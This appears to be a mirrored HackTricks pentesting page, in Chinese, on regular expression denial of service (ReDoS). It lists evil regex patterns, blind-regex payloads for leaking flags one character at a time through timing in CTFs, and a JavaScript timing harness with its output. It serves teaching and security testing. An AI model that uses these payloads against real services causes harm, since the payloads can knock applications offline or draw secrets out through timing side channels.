Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 22:52:06 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/regular-expression-denial-of-service-redos.md

103 lines
6.1 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 正则表达式拒绝服务 - ReDoS
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
# 正则表达式拒绝服务ReDoS
**正则表达式拒绝服务ReDoS**发生在有人利用正则表达式(一种在文本中搜索和匹配模式的方法)工作方式的弱点时。有时,当使用正则表达式时,它们可能变得非常缓慢,特别是当它们处理的文本片段变大时。这种缓慢可能会变得非常严重,即使文本大小略微增加,速度也会快速增长。攻击者可以利用这个问题使使用正则表达式的程序长时间停止正常工作。
## 问题的正则表达式天真算法
**查看详情:[https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**
## 恶意正则表达式 <a href="#evil-regexes" id="evil-regexes"></a>
恶意正则表达式模式是那些可能**在精心制作的输入上卡住导致DoS**的模式。恶意的正则表达式模式通常包含重复的分组和重复或在重复组内部重叠的交替。一些恶意模式的示例包括:
* (a+)+
* ([a-zA-Z]+)*
* (a|aa)+
* (a|a?)+
* (.*a){x},其中 x > 10
所有这些都对输入`aaaaaaaaaaaaaaaaaaaaaaaa!`易受攻击。
## ReDoS有效载荷
### 通过ReDoS进行字符串外泄
在CTF或漏洞赏金也许您**控制了与敏感信息(标志)匹配的正则表达式**。然后,如果**正则表达式匹配**,而**不匹配**时**页面冻结(超时或更长的处理时间)**可能会很有用。这样,您将能够**逐个字符地外泄**字符串:
* 在[**这篇文章**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)中您可以找到这个ReDoS规则`^(?=<flag>)((.*)*)*salt$`
* 示例:`^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
* 在[**这篇解题报告**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)中,您可以找到这个:`<flag>(((((((.*)*)*)*)*)*)*)!`
* 在[**这篇解题报告**](https://ctftime.org/writeup/25869)中,他使用了:`^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
### ReDoS控制输入和正则表达式
以下是您**控制**输入和**正则表达式**的**ReDoS**示例:
```javascript
function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}
// This payloads work because the input has several "a"s
[
// "((a+)+)+$", //Eternal,
// "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$", //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
```
## 工具
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)
## 参考资料
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
Reference in a new issue View git blame Copy permalink